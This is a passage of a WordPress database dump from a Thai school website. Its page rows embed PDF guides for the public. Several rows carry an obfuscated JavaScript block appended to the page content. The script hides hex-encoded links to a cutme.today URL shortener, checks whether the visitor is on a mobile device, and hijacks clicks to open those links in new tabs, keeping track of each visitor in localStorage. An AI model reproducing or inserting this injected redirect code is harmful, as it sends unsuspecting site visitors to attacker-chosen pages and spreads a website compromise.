_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','อำนาจหน้าที่','','inherit','closed','closed','','542-revision-v1','','','2024-08-09 11:47:01','2024-08-09 04:47:01','',542,'http://pakhaeng.ssk.in.th/?p=770',0,'revision','',0),
(771,1,'2024-08-09 11:52:07','2024-08-09 04:52:07','<!-- wp:file {\"id\":1075,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน-1.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน-1.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"คู่มือสำหรับประชาชน: การขอย้ายเข้าเรียนของโรงเรียนในสังกัด สพฐ.\"></object><a id=\"wp-block-file--media-a634f007-2cff-4959-8df0-b3f50d5664ab\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน-1.pdf\">คู่มือสำหรับประชาชน: การขอย้ายเข้าเรียนของโรงเรียนในสังกัด สพฐ.</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน-1.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-a634f007-2cff-4959-8df0-b3f50d5664ab\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":772,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"011แนวปฏิบัติผู้รับบริการ\"></object><a id=\"wp-block-file--media-c37f0789-e1d1-482c-8514-665f1c11cccf\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\">011แนวปฏิบัติผู้รับบริการ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c37f0789-e1d1-482c-8514-665f1c11cccf\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แนวปฏิบัติผู้รับบริการคู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อแนวปฏิบัติผู้รับบริการ','','publish','closed','closed','','%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3','','','2024-08-30 12:18:24','2024-08-30 05:18:24','',0,'http://pakhaeng.ssk.in.th/?page_id=771',0,'page','',0),
(772,1,'2024-08-09 11:51:59','2024-08-09 04:51:59','','011แนวปฏิบัติผู้รับบริการ','','inherit','','closed','','011%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81%e0%b8%b2','','','2024-08-09 11:51:59','2024-08-09 04:51:59','',771,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf',0,'attachment','application/pdf',0),
(773,1,'2024-08-09 11:52:07','2024-08-09 04:52:07','<!-- wp:file {\"id\":772,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"011แนวปฏิบัติผู้รับบริการ\"></object><a id=\"wp-block-file--media-c37f0789-e1d1-482c-8514-665f1c11cccf\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\">011แนวปฏิบัติผู้รับบริการ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c37f0789-e1d1-482c-8514-665f1c11cccf\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 